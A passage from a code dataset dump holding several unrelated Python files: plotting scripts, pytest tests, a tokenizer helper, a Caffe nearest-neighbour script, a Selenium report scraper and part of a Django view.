16])\n axes.yaxis.grid(True)\n axes.set_ylim([-150, 3600])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Number of GCMI Apps')\n\n # Show graphic\n plt.savefig(\"enhanced_vs_herter.pdf\", bbox_inches='tight')\n\ndef plot_line_chart_caches_same_messages(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(3.5, 3.5))\n\n axes = plt.gca()\n #axes.set_ylim([0, 2500])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Percentage of cacheable Messages')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), 'With Cache': data[0], 'Without Cache': data[1]})\n\n # Create lines\n plt.plot('x', 'With Cache', data=df, marker='.', markerfacecolor='darkgreen', markersize=5, color='darkgreen',\n linewidth=1)\n plt.plot('x', 'Without Cache', data=df, marker='.', markerfacecolor='blue', markersize=5, color='blue',\n linewidth=1)\n plt.legend()\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_double_line_chart_caches_same_messages(data, labels, filename):\n plt.clf()\n\n plt.figure(figsize=(4, 4))\n\n axes = plt.gca()\n #axes.set_ylim([0, 2500])\n axes.set_ylabel(r'Time in $\\mu s$')\n axes.set_xlabel('Percentage of cacheable Messages')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n df = pd.DataFrame({'x': np.arange(len(labels)), '1000 Filters\\nwith Cache': data[0], '1000 Filters\\nwithout Cache': data[1],\n '4000 Filters\\nwith Cache': data[2], '4000 Filters\\nwithout Cache': data[3],\n '8000 Filters\\nwith Cache': data[4], '8000 Filters\\nwithout Cache': data[5]})\n\n print('1000 without cache on avg: {}'.format(statistics.mean(data[1])))\n print('4000 without cache on avg: {}'.format(statistics.mean(data[3])))\n print('8000 without cache on avg: {}'.format(statistics.mean(data[5])))\n\n # Create lines\n plt.plot('x', '8000 Filters\\nwith Cache', data=df, marker='.', markerfacecolor='#B80028', markersize=5,\n color='#B80028',\n linewidth=1)\n plt.plot('x', '8000 Filters\\nwithout Cache', data=df, marker='.', markerfacecolor='#FF9900', markersize=5, color='#FF9900',\n linewidth=1)\n plt.plot('x', '4000 Filters\\nwith Cache', data=df, marker='.', markerfacecolor='#6A8347', markersize=5,\n color='#6A8347',\n linewidth=1)\n plt.plot('x', '4000 Filters\\nwithout Cache', data=df, marker='.', markerfacecolor='#A6CB45', markersize=5, color='#A6CB45',\n linewidth=1)\n plt.plot('x', '1000 Filters\\nwith Cache', data=df, marker='.', markerfacecolor='#005B9A', markersize=5, color='#005B9A',\n linewidth=1)\n plt.plot('x', '1000 Filters\\nwithout Cache', data=df, marker='.', markerfacecolor='#74C2E1', markersize=5, color='#74C2E1',\n linewidth=1)\n\n box = axes.get_position()\n axes.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n # Put a legend to the right of the current axis\n axes.legend(fontsize='9', loc='center left', bbox_to_anchor=(1, 0.5))\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig(filename, bbox_inches='tight')\n\ndef plot_throughput_filter(data, labels):\n plt.clf()\n\n plt.figure(figsize=(4.5, 4))\n\n axes = plt.gca()\n #axes.set_ylim([0, 80000])\n axes.set_ylabel('Responses per s')\n axes.set_xlabel('Number of GCMI Apps')\n axes.yaxis.grid(True)\n\n y_pos = np.arange(len(labels))\n\n line_names = ['0%', '20%', '40%', '60%', '80%', '100%']\n\n df = pd.DataFrame({'x': np.arange(len(labels)), line_names[0]: data[0], line_names[1]: data[1],\n line_names[2]: data[2], line_names[3]: data[3], line_names[4]: data[4], line_names[5]: data[5]})\n\n # Create lines\n colors = ['darkgreen', 'blue', 'orange', 'purple', 'red', 'pink']\n for i, line_name in enumerate(line_names):\n plt.plot('x', line_name, data=df, marker='.', markerfacecolor=colors[i], markersize=5, color=colors[i], linewidth=1)\n\n # Shrink current axis by 20%\n box = axes.get_position()\n axes.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n # Put a legend to the right of the current axis\n axes.legend(title='matching\\nmessages', fontsize = '9', loc='center left', bbox_to_anchor=(1, 0.5))\n\n # Create names on the x-axis\n plt.xticks(y_pos, labels)\n\n plt.savefig('scenario_t3_result.pdf', bbox_inches='tight')\n\nif __name__ == \"__main__\":\n args = sys.argv[2:]\n mode = sys.argv[1:][0]\n\n if mode == \"apps\":\n directory = args[0]\n\n mean_data_points = []\n stdev_data_points = []\n labels = []\n\n for number_of_apps in [1, 2, 4, 8, 16]:\n mean, stdev = get_results_for_file(directory + \"/proxy_times_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n stdev_data_points.append(stdev)\n labels.append(str(number_of_apps))\n\n plot_bar_chart(mean_data_points, stdev_data_points, labels, \"scenario_d4_result.pdf\")\n\n elif mode == \"matching_messages\":\n directory = args[0]\n numbers_of_apps = [1, 2, 4, 8, 16]\n matching_ratios = [0, 20, 40, 60, 80, 100]\n labels = []\n mean_data_lines = []\n\n for matching_ratio in matching_ratios:\n labels.append(str(matching_ratio) + \"%\")\n\n for number_of_apps in numbers_of_apps:\n mean_data_points = []\n for matching_ratio in matching_ratios:\n mean, stdev = get_results_for_file(\n directory + \"/{}_percent_matching/proxy_times_{}.txt\".format(matching_ratio, number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_line_chart_matching_messages(mean_data_lines, labels, 'plot_matching.pdf')\n\n elif mode == \"with_without_tls\":\n directory = args[0]\n\n mean_data_lines = []\n labels = [1, 2, 4, 8, 16]\n\n for subdirectory in [directory + '/with_tls', directory + '/without_tls']:\n mean_data_points = []\n for number_of_apps in labels:\n mean, stdev = get_results_for_file(subdirectory + \"/proxy_times_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_line_chart_with_without_tls(mean_data_lines, labels, 'plot_tls.pdf')\n\n elif mode == \"filter_in_one_multiple_apps\":\n labels = [1000, 2000, 4000, 8000, 16000]\n mean_data_lines = []\n\n for directory in args:\n mean_data_points = []\n for number_of_apps in [1, 2, 4, 8, 16]:\n mean, stdev = get_results_for_file(directory + \"/proxy_times_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_line_chart_filter_apps(mean_data_lines, labels, 'plot_filter_apps.pdf')\n\n elif mode == \"filter_caches_same_messages\":\n mean_data_lines = []\n labels = [0, 20, 40, 60, 80, 100]\n\n for directory in args:\n mean_data_points = []\n for number_of_apps in labels:\n mean, stdev = get_results_for_file(directory + \"/proxy_times_cache_{}.txt\".format(number_of_apps))\n mean_data_points.append(mean)\n\n mean_data_lines.append(mean_data_points)\n\n plot_double_line_chart_caches_same_messages(mean_data_lines, labels, 'plot_no_vs_hashmap_cache.pdf')\n\n elif mode == \"throughput_filter\":\n labels = [1, 2, 4, 8, 16]\n data_lines = []\n directory = args[0]\n\n subfolder_names = []\n for matching_messages in [0, 20, 40, 60, 80, 100]:\n subfolder_names.append('/{}_percent_matching'.format(matching_messages))\n\n filenames = []\n for number_of_apps in [1, 2, 4, 8, 16]:\n filenames.append('cbench_throughput_{}.log'.format(number_of_apps))\n\n for subfolder_name in subfolder_names:\n data_line = []\n for filename in filenames:\n data_line.append(get_avg_from_cbench_result(directory + subfolder_name + \"/\" + filename))\n data_lines.append(data_line)\n\n plot_throughput_filter(data_lines, labels)\n\n elif mode == \"herter\":\n labels = [1, 2, 4, 8, 16]\n directory = args[0]\n data_lines = []\n data_lines_stdev = []\n\n for mode in [\"enhanced_services\", \"enhanced_proxychain\", \"herter\"]:\n data_line = []\n data_line_stdev = []\n for label in labels:\n mean, stdev = get_pybench_result(directory + \"/cbench_times_{}_{}.txt\".format(mode, label))\n data_line.append(mean)\n data_line_stdev.append(stdev)\n\n data_lines.append(data_line)\n data_lines_stdev.append(data_line_stdev)\n\n plot_herter_vs_enhanced_bar(data_lines, data_lines_stdev)\n","sub_path":"experiments/scenario_t3/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":16226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38991022","text":"# 988 Подпоследовательности\nn = int(input())\nmass = [int(i) for i in input().split()]\nd = [1] * n\n\nfor i in range(n):\n\n\tfor j in range(i):\n\t\tif mass[j] < mass[i]:\n\t\t\td[i] = max(d[i], d[j] + 1)\n\n\nprint(max(d))\n","sub_path":"1-999/988.py","file_name":"988.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55980138","text":"import wranglertools.get_field_info as gfi\nimport pytest\n\n# test data is in conftest.py\n\n\ndef test_get_field_type():\n field1 = {'type': 'string'}\n assert gfi.get_field_type(field1) == 'string'\n\n field2 = {'type': 'number'}\n assert gfi.get_field_type(field2) == 'number'\n\n\ndef test_is_subobject():\n field = {'items': {'type': 'object'}}\n assert gfi.is_subobject(field)\n\n\ndef test_is_not_subobject_wrong_type():\n field = {'items': {'type': 'string'}}\n assert not gfi.is_subobject(field)\n\n\ndef test_is_not_subobject_invalid_data():\n field = {'items': 'ugly'}\n assert not gfi.is_subobject(field)\n\n\ndef test_dotted_field_name():\n assert \"parent.child\" == gfi.dotted_field_name(\"child\", \"parent\")\n\n\ndef test_dotted_field_name_no_parent():\n assert \"child\" == gfi.dotted_field_name(\"child\")\n\n\ndef test_build_field_list(item_properties):\n field_list = gfi.build_field_list(item_properties, required_fields=[\"title\", \"pi\"])\n assert field_list\n assert len(field_list) == 13\n names = [i.name for i in field_list]\n assert '*title' in names\n\n\ndef test_build_field_list_gets_enum(item_properties):\n field_list = gfi.build_field_list(item_properties, include_enums=True)\n for field in field_list:\n if field.name == \"project\":\n assert ['4DN', 'External'] == field.enum\n\n field_list = gfi.build_field_list(item_properties)\n for field in field_list:\n if field.name == \"project\":\n assert not field.enum\n\n\ndef test_build_field_list_gets_desc(item_properties):\n field_list = gfi.build_field_list(item_properties, include_description=True)\n for field in field_list:\n if field.name == \"name\":\n assert \"official grant\" in field.desc\n\n field_list = gfi.build_field_list(item_properties)\n for field in field_list:\n if field.name == \"name\":\n assert len(field.comm) == 0\n\n\ndef test_build_field_list_gets_comments(item_properties):\n field_list = gfi.build_field_list(item_properties, include_comment=True)\n for field in field_list:\n if field.name == \"end_date\":\n assert len(field.comm) >= 1\n\n field_list = gfi.build_field_list(item_properties)\n for field in field_list:\n if field.name == \"end_date\":\n assert len(field.comm) == 0\n\n\ndef test_build_field_list_skips_calculated_properties(calc_properties):\n field_list = gfi.build_field_list(calc_properties)\n assert 1 == len(field_list)\n assert field_list[0].name == 'description'\n\n\ndef test_build_field_list_embeds_with_dots(embed_properties):\n field_list = gfi.build_field_list(embed_properties)\n assert 2 == len(field_list)\n assert field_list[0].name.startswith('experiment_relation')\n assert \"array of embedded objects\" in field_list[0].ftype\n assert field_list[1].name.startswith('experiment_relation')\n\n\ndef test_get_uploadable_fields_mock(connection, mocker, returned_vendor_schema):\n with mocker.patch('wranglertools.fdnDCIC.requests.get', return_value=returned_vendor_schema):\n field_dict = gfi.get_uploadable_fields(connection, ['Vendor'])\n for field in field_dict['Vendor']:\n assert field.name is not None\n assert field.ftype is not None\n assert field.desc is not None\n assert field.comm is not None\n assert field.enum is not None\n\n\ndef xls_to_list(xls_file, sheet):\n \"\"\"To compare xls files to reference ones, return a sorted list of content.\"\"\"\n from operator import itemgetter\n import xlrd\n return_list = []\n wb = xlrd.open_workbook(xls_file)\n read_sheet = wb.sheet_by_name(sheet)\n cols = read_sheet.ncols\n rows = read_sheet.nrows\n for row_idx in range(rows):\n row_val = []\n for col_idx in range(cols):\n cell_value = str(read_sheet.cell(row_idx, col_idx))\n\n row_val.append(cell_value)\n return_list.append(row_val)\n return return_list.sort(key=itemgetter(1))\n\n\n@pytest.mark.file_operation\ndef test_create_xls_vendor(connection, mocker, returned_vendor_schema):\n xls_file = \"./tests/data_files/GFI_test_vendor.xls\"\n xls_ref_file = \"./tests/data_files/GFI_test_vendor_reference.xls\"\n import os\n try:\n os.remove(xls_file)\n except OSError:\n pass\n with mocker.patch('wranglertools.fdnDCIC.requests.get', return_value=returned_vendor_schema):\n field_dict = gfi.get_uploadable_fields(connection, ['Vendor'])\n gfi.create_xls(field_dict, xls_file)\n assert os.path.isfile(xls_file)\n assert xls_to_list(xls_file, \"Vendor\") == xls_to_list(xls_ref_file, \"Vendor\")\n try:\n os.remove(xls_file)\n except OSError:\n pass\n\n\n@pytest.mark.file_operation\ndef test_create_xls_experiment_set(connection, mocker, returned_experiment_set_schema):\n xls_file = \"./tests/data_files/GFI_test_Experiment_Set.xls\"\n xls_ref_file = \"./tests/data_files/GFI_test_Experiment_Set_reference.xls\"\n import os\n try:\n os.remove(xls_file)\n except OSError:\n pass\n with mocker.patch('wranglertools.fdnDCIC.requests.get', return_value=returned_experiment_set_schema):\n field_dict = gfi.get_uploadable_fields(connection, ['ExperimentSet'], True, True, True)\n gfi.create_xls(field_dict, xls_file)\n assert os.path.isfile(xls_file)\n assert xls_to_list(xls_file, \"ExperimentSet\") == xls_to_list(xls_ref_file, \"ExperimentSet\")\n try:\n os.remove(xls_file)\n except OSError:\n pass\n","sub_path":"tests/test_get_field_info.py","file_name":"test_get_field_info.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644524434","text":"def prime(n):\n x=1\n for i in range(2,n):\n if n%i==0:\n x=0\n break\n else:\n x=1\n\n return x\nnum=int(input(\"how many primies do you want\"))\ni=2\nc=1\nwhile True:\n if prime(i):\n print(i)\n c+=1\n i+=1\n if c>num:\n break\n","sub_path":"Primecheck.py","file_name":"Primecheck.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"140353173","text":"import re\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef huggingface_tokenize(docs, tokenizer, with_tqdm=False, with_token_spans=True, doc_id_col=\"doc_id\", text_col=\"text\", **kwargs):\n doc_ids = []\n tokens = []\n begins = []\n ends = []\n token_idx = []\n\n if with_token_spans:\n special_tokens = [t for token in tokenizer.special_tokens_map.values() for t in ((token,) if isinstance(token, str) else token)]\n special_tokens += [\"▁\", \"##\", \"\"]\n for doc_id, text in tqdm(zip(docs[doc_id_col], docs[text_col]), disable=not with_tqdm, total=len(docs), leave=False, desc=\"Tokenizing\"):\n i = 0\n token_id = 0\n\n sentence_pieces = tokenizer.tokenize(text)\n tokenizer_output = tokenizer.encode_plus(tokenizer.convert_tokens_to_ids(sentence_pieces), return_special_tokens_mask=True, **kwargs)\n encoded_pieces = tokenizer.convert_ids_to_tokens(tokenizer_output[\"input_ids\"])\n pieces = np.asarray(encoded_pieces)\n pieces[~np.asarray(tokenizer_output[\"special_tokens_mask\"], dtype=bool)] = sentence_pieces\n for piece, encoded_piece in zip(pieces, encoded_pieces):\n doc_ids.append(doc_id)\n tokens.append(encoded_piece)\n striped_piece = piece\n for special in special_tokens:\n striped_piece = striped_piece.replace(special, \"\")\n piece_size = len(striped_piece)\n delta = len(re.search(r\"^\\s*\", text[i:]).group(0))\n if striped_piece != text[i+delta:i+delta + piece_size]:\n raise Exception(f\"During processing of doc {doc_id}, wordpiece tokenizer replaced {repr(text[i+delta:i+delta + piece_size])} (in {repr(text[i:i+delta + piece_size + 5])}) \"\n f\"with {repr(striped_piece)} (or multiple pieces). \"\n f\"You must perform substitutions before to ensure that this does not happen, otherwise wordpieces characters cannot be computed.\")\n i += delta\n begins.append(i)\n i += piece_size\n ends.append(i)\n token_idx.append(token_id)\n token_id += 1\n tokens = pd.DataFrame({doc_id_col: doc_ids, \"token_id\": range(len(token_idx)), \"token_idx\": token_idx, \"token\": tokens, \"begin\": begins, \"end\": ends})\n else:\n for doc_id, text in tqdm(zip(docs[doc_id_col], docs[text_col]), disable=not with_tqdm, total=len(docs), leave=False, desc=\"Tokenizing\"):\n token_id = 0\n for encoded_piece in tokenizer.convert_ids_to_tokens(tokenizer.encode(text, **kwargs)):\n doc_ids.append(doc_id)\n tokens.append(encoded_piece)\n token_idx.append(token_id)\n token_id += 1\n tokens = pd.DataFrame({doc_id_col: doc_ids, \"token_id\": range(len(token_idx)), \"token_idx\": token_idx, \"token\": tokens})\n\n voc = tokenizer.convert_ids_to_tokens(list(range(tokenizer.vocab_size)))\n counts = {}\n for i, token in enumerate(list(voc)):\n counts[token] = counts.get(token, 0) + 1\n if counts[token] > 1:\n voc[i] = token + \"-{}\".format(i)\n token_voc = pd.CategoricalDtype(voc)\n tokens = tokens.astype({doc_id_col: docs[doc_id_col].dtype, \"token\": token_voc})\n tokens = tokens.merge(docs[[doc_id_col] + [col for col in docs.columns if col not in tokens.columns and col != \"text\"]])\n return tokens\n","sub_path":"nlstruct/chunking/huggingface_tokenizer.py","file_name":"huggingface_tokenizer.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590588436","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom pprint import pprint\nfrom numpy.random import choice\nfrom scipy.spatial.distance import cdist\n\n# Make sure that caffe is on the python path:\ncaffe_root = '../../caffe/' # this file is expected to be in {caffe_root}/examples\nimport sys\nsys.path.insert(0, caffe_root + 'python')\n\nimport caffe\n\ntest_listfile = '/scratch/16824/data/testlist_class.txt'\nresult_file = 'cls_results.txt'\n\ncaffe.set_device(0)\ncaffe.set_mode_gpu()\nnet = caffe.Net('/home/sbokhari/assignment1/py_scripts/train_val_p7.prototxt',\n '/home/sbokhari/assignment1/py_scripts/models/model_p7.caffemodel',\n caffe.TEST)\n\ntest_list = np.loadtxt(test_listfile, str, comments=None, delimiter='\\n')\ndata_counts = len(test_list)\nbatch_size = net.blobs['data'].data.shape[0]\nbatch_count = int(np.ceil(data_counts * 1.0 / batch_size))\n\naccuracy = 0\nfnames = []\nlsize = net.blobs['fc7'].data.shape\nwholeset = []\n\nfor i in range(batch_count):\n\n out = net.forward()\n data = net.blobs['fc7'].data\n print(data)\n for j in range(batch_size):\n id = i * batch_size + j\n if id >= data_counts:\n break\n\n fname = test_list[id].split(' ')[0]\n fnames.append(fname)\n\n wholeset.append(np.copy(data[j,:].reshape((1,lsize[1]))))\n\nwholeset = np.concatenate(tuple(wholeset))\n\nfiles = ['NN_1/', 'NN_2/', 'NN_3/']\nimgsIds = choice(len(fnames), len(files))\nimgFeats = wholeset[imgsIds, :]\ndists = cdist(imgFeats, wholeset, 'cosine')\n\nsortids = np.argsort(dists, axis=1)\nsorts = np.sort(dists, axis=1)\n\n\nfor i in range(len(files)):\n print(\"Image {0}: {1}\".format(i+1, fnames[imgsIds[i]]))\n for j in range(11): #sortids[i,0:10]:\n print(\"NN {0} at {2}: {1}\".format(j, fnames[sortids[i,j]], dists[i,int(sortids[i,j])]))\n\n img = Image.open('/scratch/16824/data/crop_imgs/'+fnames[sortids[i,j]])\n img.save(files[i]+'nn'+str(j)+'.jpg')\n","sub_path":"Train/test_cls_orig.py","file_name":"test_cls_orig.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90673326","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.webdriver import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport requests\nimport json\nimport re\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\n# Imports from Will's Previous Work\nfrom robobrowser import RoboBrowser #for navigating and form submission\nimport datetime\nfrom datetime import timedelta, date\nimport time\nimport csv\nimport pandas as pd\nimport MySQLdb\nimport os\n# End of Import Section\n\n# Importing Webdriver_Manager to prevent the need for maintenance.\n# https://github.com/SergeyPirogov/webdriver_manager\n\n\"\"\"\nThis was the original method I was using when developing this script, please run this if you are curious of what is happening under the hood of Selenium or you need to troubleshoot any issues.\n\"\"\"\n# # print(\"Real Browser Launching\")\n# browser = webdriver.Chrome(ChromeDriverManager().install())\n# # print(\"Real Browser has Launched\")\n\n\"\"\"\nThe Headless browsing option greatly reduces the amount of time it takes for the scraper to run.\n\"\"\"\nprint(\"Headless Browser Running\")\noptions = Options()\noptions.add_argument(\"--headless\") # Runs Chrome in headless mode.\noptions.add_argument('--no-sandbox') # Bypass OS security model\noptions.add_argument('--disable-gpu') # applicable to windows os only\noptions.add_argument('start-maximized') # \noptions.add_argument('disable-infobars')\noptions.add_argument(\"--disable-extensions\")\nbrowser = webdriver.Chrome(chrome_options=options, executable_path=ChromeDriverManager().install())\nprint(\"Headless Browser has Launched\")\n\ndef login_into_dash(json_target_file):\n \"\"\"\n Takes the login information from JSON file and passes data to login form.\n\n Parameter json_target_file needs to be equal to the file's location.\n\n Contents of the file must be organized as follows [Note: don't forget the curly braces]:\n \n {\n \"username\": \"please-put-your-username-here\",\n \"password\": \"please-put-your-password-here\"\n }\n\n\n \"\"\"\n browser.get(\"http://privdemo.myeldash.com/\")\n with open(json_target_file) as login_data:\n data = json.load(login_data)\n username = data['username']\n password = data['password']\n browser.find_element_by_name(\"ctl00$ContentPlaceHolder1$Username\").send_keys(username)\n browser.find_element_by_name(\"ctl00$ContentPlaceHolder1$Password\").send_keys(password)\n browser.find_element_by_name(\"ctl00$ContentPlaceHolder1$btnLogin\").click()\n\ndef download_excel():\n browser.get(\"http://privdemo.myeldash.com/Reports/AdHoc_View.aspx?id=6\")\n browser.find_element_by_id(\"ContentPlaceHolder1_lnkExport\").click()\n\ndef read_table(url):\n browser.get(url)\n\n # Start of Grabbing Iterator Information\n\n items_and_pages_element = browser.find_element_by_class_name(\"rgInfoPart\").text\n digits_list = []\n pattern = r'[\\d]+[.,\\d]+|[\\d]*[.][\\d]+|[\\d]+'\n if re.search(pattern, items_and_pages_element) is not None:\n for catch in re.finditer(pattern, items_and_pages_element):\n # print(catch[0])\n digits_list.append(catch[0])\n else:\n print(\"Something is broken.\")\n\n # print(digits_list)\n\n items = int(digits_list[0])\n pages = int(digits_list[1])\n print(\"Number of items: \" + str(items))\n print(\"Number of pages: \" + str(pages))\n\n # End of Grabbing Iterator Information\n\n # This block controls table scraping.\n\n table_list = browser.find_elements_by_class_name('rgClipCells')\n\n \n \n # We have to grab table headings from the report.\n # table_headers_table = table_list[0]\n # print(table_headers_table)\n\n # table_headers_table_table_row_element = browser.find_element_by_xpath(\"/html/body/form/div[4]/div[3]/div[6]/div[6]/div[1]/div/table/thead/tr[1]\").get_attribute('outerHTML')\n\n\n table_we_want = table_list[1].get_attribute('outerHTML')\n \n table_we_want = re.sub(r'<\\/span>', 'False', table_we_want)\n table_we_want = re.sub(r'<\\/span>', 'True', table_we_want)\n\n # print(table_we_want)\n\n dataframe = pd.DataFrame()\n\n dataframe = dataframe.append(pd.read_html(table_we_want),ignore_index=True)\n print(len(dataframe.index))\n # print(dataframe)\n # print(len(dataframe.index))\n \n # This is the version that reads the number of items in the page and counts the items until all items have been read from the tables.\n\n while int(len(dataframe.index)) < items:\n browser.find_element_by_css_selector(\"button.t-button.rgActionButton.rgPageNext\").click()\n table_list = browser.find_elements_by_class_name('rgClipCells')\n table_we_want = table_list[1].get_attribute('outerHTML')\n\n # We need to apply the regext statements from earlier to each loop as well.\n\n table_we_want = re.sub(r'<\\/span>?', 'True', table_we_want)\n table_we_want = re.sub(r'<\\/span>?', 'False', table_we_want)\n\n # print(table_we_want)\n dataframe = dataframe.append(pd.read_html(table_we_want),ignore_index=True)\n print(len(dataframe.index))\n time.sleep(5)\n else:\n print(\"We are done scraping.\")\n print(dataframe)\n print(len(dataframe.index))\n\n # page_counter = 0\n # page_limiter = 7\n\n # while page_counter < page_limiter:\n # browser.find_element_by_css_selector(\"button.t-button.rgActionButton.rgPageNext\").click()\n # table_list = browser.find_elements_by_class_name('rgClipCells')\n # table_we_want = table_list[1].get_attribute('outerHTML')\n\n # # We need to apply the regext statements from earlier to each loop as well.\n\n # table_we_want = re.sub(r'<\\/span>', 'False', table_we_want)\n # table_we_want = re.sub(r'<\\/span>', 'True', table_we_want)\n\n # # print(table_we_want)\n # dataframe = dataframe.append(pd.read_html(table_we_want),ignore_index=True)\n # print(len(dataframe.index))\n # time.sleep(5)\n # page_counter += 1\n # else:\n # print(\"We are done scraping.\")\n # print(dataframe)\n # print(len(dataframe.index))\n\n\n \"\"\"\n Here we must reorder the columns so our data can be compatible with older DASH Information\n \n The changes we are making:\n - Rearranging the columns to align with the database schema.\n \"\"\"\n\n # dataframe = dataframe[dataframe.columns.drop(\"Project Name\")]\n\n # dataframe.to_csv(\"Export_Before_Builder_Project.csv\", encoding=\"utf-8\", index=False)\n\n # dataframe = dataframe[dataframe.columns.drop(1)]\n\n # dataframe.to_csv(\"Export_After_Builder_Project_col_Drop.csv\", encoding=\"utf-8\", index=False)\n\n dataframe = dataframe[[0,1,2,3,4,5,6,7,8,9,10,11,12]]\n\n # dataframe.to_csv(\"Export_After_Reorganization.csv\", encoding=\"utf-8\", index=False)\n\n # dataframe.to_csv(\"Export.csv\", encoding=\"utf-8\", index=False)\n \n dataframe = dataframe.replace({',': '.'}, regex=True) # remove all commas\n dataframe = dataframe.replace({';': '.'}, regex=True) # remove all semicolons\n dataframe = dataframe.replace({r'\\r': ' '}, regex=True)# remove all returns\n dataframe = dataframe.replace({r'\\n': ' '}, regex=True)# remove all newlines\n\n # Remove the previous \"DASH_Service_TSheets.csv\" file.\n if os.path.exists(\"DASH_Service_TSheets.csv\"):\n os.remove(\"DASH_Service_TSheets.csv\")\n else:\n print(\"We do not have to remove the file.\")\n\n \n dataframe = dataframe.rename(columns={0:\"RatingID\",1:\"Address\",2:\"City\",3:\"State\",4:\"Zip\",5:\"Builder\",6:\"Subdivision\",7:\"Lot\",8:\"ServiceID\",9:\"ServiceType\",10:\"ServiceDate\",11:\"Employee\",12:\"LastUpdated\"})\n\n dataframe['LastUpdated'].astype('datetime64[ns]')\n pd.to_datetime(dataframe['LastUpdated'], utc=False)\n pd.to_datetime(dataframe['ServiceDate'], utc=False)\n\n '''\n List we must match.\n [\"RatingID\",\"Address\",\"City\",\"State\",\"Zip\",\"Builder\",\"Subdivision\",\"Lot\",\"ServiceID\",\"ServiceType\",\"ServiceDate\",\"Employee\",\"LastUpdated\"]\n '''\n\n dataframe.to_csv(\"DASH_Service_TSheets.csv\", index=True)\n\ndef logout_session():\n browser.get(\"http://sem.myirate.com/Dashboard_Company.aspx\")\n browser.find_element_by_xpath('//*[@id=\"navProfile\"]').click()\n try:\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((By.LINK_TEXT,\"Log Out\"))).click()\n except:\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((By.LINK_TEXT,\"Log Out\"))).click()\n\ndef main():\n \"\"\"\n Please use these to control the previously defined functions.\n \"\"\"\n login_into_dash(\"./DASHLoginInfo.json\")\n read_table(\"http://sem.myirate.com/Reports/AdHoc_View.aspx?id=1255\")\n logout_session()\n\nmain()\nbrowser.quit()","sub_path":"Archive/DASHNextGen_Service_TSHEETS.py","file_name":"DASHNextGen_Service_TSHEETS.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223170368","text":"\"\"\" location_selector/views.py\n\n This module implements the view functions for the \"location_selector\"\n application.\n\"\"\"\nimport string\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\n\nfrom shared.models import Level, Location\nfrom shared.models import Name, LocationName\nfrom shared.lib import helpers\n\nfrom admin_interface import menus\n\n#############################################################################\n\ndef select_by_level(request, selector_id, level_num):\n \"\"\" Respond to the \"/select_by_level\" URL.\n\n We let the user choose a location with the given level number.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n if request.method == \"GET\":\n params = request.GET\n elif request.method == \"POST\":\n params = request.POST\n\n if \"location_selector\" not in request.session:\n # Should never happen.\n return HttpResponseRedirect(reverse(settings.ADMIN_HOME_VIEW))\n\n info = request.session['location_selector']['selectors'][int(selector_id)]\n \n menu_heading = info['menu_heading']\n menu_cur_app = info['menu_cur_app']\n menu_cur_view = info['menu_cur_view']\n base_url = info['base_url']\n\n cancel_url = reverse(menu_cur_app + \".views.\" + menu_cur_view)\n\n try:\n level = Level.objects.get(level=level_num)\n except Level.DoesNotExist:\n return HttpResponseRedirect(cancel_url) # Should never happen.\n\n first_letter = params.get('first', \"\")\n if request.method == \"POST\":\n search_text = params.get('search_text', \"\")\n else:\n search_text = \"\"\n\n if search_text != \"\":\n first_letter = \"\"\n\n location_list = Location.objects.filter(level=level)\n if first_letter != \"\":\n location_list = location_list.filter(name__istartswith=first_letter)\n if search_text != \"\":\n location_list = location_list.filter(name__istartswith=search_text)\n\n paginator = Paginator(location_list, 25) # Show 25 locations per page.\n\n page_num = params.get('page', 0)\n\n try:\n page = paginator.page(page_num)\n except (PageNotAnInteger, EmptyPage):\n # Invalid page -> show the first page.\n page = paginator.page(1)\n\n filterOptions = []\n filterOptions.append({'value' : \"\",\n 'label' : 